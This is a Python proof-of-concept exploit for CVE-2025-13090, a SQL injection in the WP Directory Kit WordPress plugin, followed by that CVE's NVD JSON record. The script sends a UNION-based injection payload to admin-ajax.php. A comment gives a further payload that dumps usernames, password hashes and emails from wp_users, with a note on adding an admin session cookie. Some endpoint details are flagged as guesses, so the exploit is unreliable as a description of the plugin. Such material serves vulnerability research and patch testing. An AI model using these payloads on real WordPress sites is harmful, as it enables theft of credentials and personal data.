CVE-2025-13090

import requests import sys # CVE-2025-13090 PoC - WP Directory Kit SQL Injection # Target: WordPress site with WP Directory Kit plugin <= 1.4.6 # Authentication: Requires Administrator-level access def exploit_sqli(target_url, search_param): """ SQL Injection payload for CVE-2025-13090 The 'search' parameter is vulnerable to SQL injection """ # Target endpoint - typically in plugin's search functionality endpoint = f"{target_url.rstrip('/')}/wp-admin/admin-ajax.php" # SQL Injection payload - extracts database version # Original query is appended with UNION-based injection injection_payload = f"' UNION SELECT NULL,NULL,@@version,NULL,NULL-- -" # Prepare the request parameters params = { 'action': 'wdk_search', # Common action name for directory search 'search': injection_payload } headers = { 'Content-Type': 'application/x-www-form-urlencoded', 'X-Requested-With': 'XMLHttpRequest' } try: print(f"[*] Sending SQL injection payload to {endpoint}") print(f"[*] Payload: {injection_payload}") response = requests.post(endpoint, data=params, headers=headers, timeout=30) if response.status_code == 200: print(f"[+] Request sent successfully") print(f"[*] Response length: {len(response.text)} bytes") # Check for database version in response if 'mysql' in response.text.lower() or any(char.isdigit() for char in response.text[:200]): print("[+] Potential successful injection detected") return response.text[:500] else: print(f"[-] Request failed with status: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return None if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-13090.py <target_url>") print("Example: python cve-2025-13090.py https://example.com") sys.exit(1) target = sys.argv[1] exploit_sqli(target, 'search') # Additional payload for extracting users table: # ' UNION SELECT user_id,user_login,user_pass,user_email,NULL FROM wp_users-- - # # Note: This PoC requires valid WordPress administrator session cookie # Add cookie to request headers: # headers['Cookie'] = 'wordpress_logged_in_xxx=session_hash'

{"cve": {"id": "CVE-2025-13090", "sourceIdentifier": "[email protected]", "published": "2025-12-02T12:16:18.280", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The WP Directory Kit plugin for WordPress is vulnerable to SQL Injection via the 'search' parameter in all versions up to, and including, 1.4.6 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3396348%40wpdirectorykit&new=3396348%40wpdirectorykit&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3405484%40wpdirectorykit&new=3405484%40wpdirectorykit&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/d0fbf502-2dfb-49e5-94a6-1525aabc08c1?source=cve", "source": "[email protected]"}]}}